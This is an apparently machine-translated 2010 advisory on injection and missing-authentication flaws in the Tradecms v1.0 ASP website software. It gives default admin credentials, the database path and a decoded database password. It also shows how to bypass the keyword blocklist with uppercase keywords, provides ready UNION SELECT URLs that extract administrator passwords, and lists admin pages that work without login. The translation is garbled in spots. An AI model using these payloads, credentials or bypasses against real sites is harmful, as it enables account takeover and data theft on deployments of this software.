Tradecms English foreign trade enterprises web site v1. 0. Vulnerability analysis-vulnerability warning-the black bar safety net

2010-07-16T00:00:00
ID MYHACK58:62201027615
Type myhack58
Reporter 佚名
Modified 2010-07-16T00:00:00

Description

Release time: 2010-07-15

Affected version: Tradecms English foreign trade enterprises web site v1. 0

Vulnerability description: injection vulnerabilities, cross-permissions vulnerability;

Database address: Clkj_DaTa/#Clkj_Cms#. mdb Database open password: The default account and password: user: admin password:1 Default background address:/Clkj_Admin/Index.html

Publishing author: m4r10 <http://hi.baidu.com/m4r10> reproduced please indicate the copyright

Vulnerability analysis:P_view. asp,N_view. asp

'Product display P_view. asp-------------------------------------------------------

set rs=server. createobject("adodb. recordset") exec="select * from clkj_Products where clkj_prid="&request("pid") //SQL query rs. open exec,conn,1,1 clkj_BigClassID=rs("clkj_BigClassID") clkj_SmallClassID=rs("clkj_SmallClassID") clkj_SmallClassName=rs("clkj_SmallClassName") clkj_BigClassName=rs("clkj_BigClassName") clkj_prtitle=rs("clkj_prtitle") clkj_prcontent=rs("clkj_prcontent") clkj_prkey=rs("clkj_prkey") clkj_prprdes=rs("clkj_prprdes") clkj_prpic=rs("clkj_prpic") rs. close

The 'news show N_view. asp---------------------------------------------------------- set rs=server. createobject("adodb. recordset") exec="select * from clkj_News where clkj_newsid="&request("nid") //SQL query rs. open exec,conn,1,1 clkj_news_Title=rs("clkj_news_Title") clkj_news_content=rs("clkj_news_content") clkj_news_db=rs("clkj_news_db") clkj_news_key=rs("clkj_news_key") clkj_news_time=rs("clkj_news_time") rs. close

Include file:<!--# include file="Clkj_Inc/clkj_inc. asp" - >

In Clkj_Inc/clkj_inc. asp contains SQL anti injection file: Clkj_Conn. asp

Clkj_Conn. asp anti-injection code:

Dim clkj_js,clkj_dui,clkj_i clkj_js=request. servervariables("query_string") //GET mode Dim deStr(1 7) //The following is a filter character deStr(0)="net user" deStr(1)="xp_cmdshell" deStr(2)="/add" deStr(3)="exec%20master. dbo. xp_cmdshell" deStr(4)="net localgroup administrators" deStr(5)="select" deStr(6)="count" deStr(7)="asc" deStr(8)="char" deStr(9)="mid" deStr(1 0)="'" deStr(1 1)=":" deStr(1 2)="""" deStr(1 3)="insert" deStr(1 4)="delete" deStr(1 5)="drop" deStr(1 6)="truncate" deStr(1 7)="from" clkj_dui=false For clkj_i= 0 to ubound(deStr) IF instr(clkj_js,deStr(clkj_i))<>0 then clkj_dui=true end IF Next IF clkj_dui Then Response. Write("error") response. end end if

This anti-injection code only filter lowercase select,so we can use SELECT uppercase easily bypass

The database is added to the password, and recently looked at a lot of the program, the database encryption code, there's even a hidden table names, fields, and the ASP file encryption, could this be a trend? In fact, I think redundant.

We look at the database password: connstr="DBQ="+server. mappath(""&amp; Clkj_mdb&"")+";DefaultDir=;DRIVER={Microsoft Access Driver (*. mdb)};password="&pwd&";"

PWD in Clkj_Inc\Clkj_Md5. asp

pwd=NumTOstring("l0k9j8h7b6l0k9j8h7b6")

And wrote a function NumTOstring: the

Function NumTOstring(num) num=replace(num,"0","1") num=replace(num,"9","2") num=replace(num,"8","3") num=replace(num,"7","4") num=replace(num,"6","5") num=replace(num,"l","a") num=replace(num,"k","s") num=replace(num,"j","d") num=replace(num,"h","f") num=replace(num,"b","g") NumTOstring=num End function

Finally get: pwd=NumTOstring("a1s2d3f4g5a1s2d3f4g5")

Then re-open the database: view administrator table name: clkj_admin,field: clkj_admin,clkj_password

The exploit: the

http://127.1/P_view.asp?pid=273%20AND%201=2%20UNION%20SELECT%201,2,3,4,5,clkj_password,clkj_admin,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7%20FROM%20clkj_admin

http://127.1/N_view.asp?nid=65%20AND%201=2%20UNION%20SELECT%201,2,3,4,5,clkj_password,7,8,9%20FROM%20clkj_admin

Directly broke administrator password

Cross-permissions vulnerability: The following file does not contain the authentication file, therefore appeared following vulnerabilities Clkj_Admin/Nimda_menu. asp without having to log in directly add, delete, columns Clkj_Admin/Nimda_user. asp without having to log in directly add, delete, administrator Clkj_Admin/Nimda_product. asp without having to log in directly increasing of the product

<source: m4r10 Links: http://hi.baidu.com/m4r10 Reprint please indicate the copyright >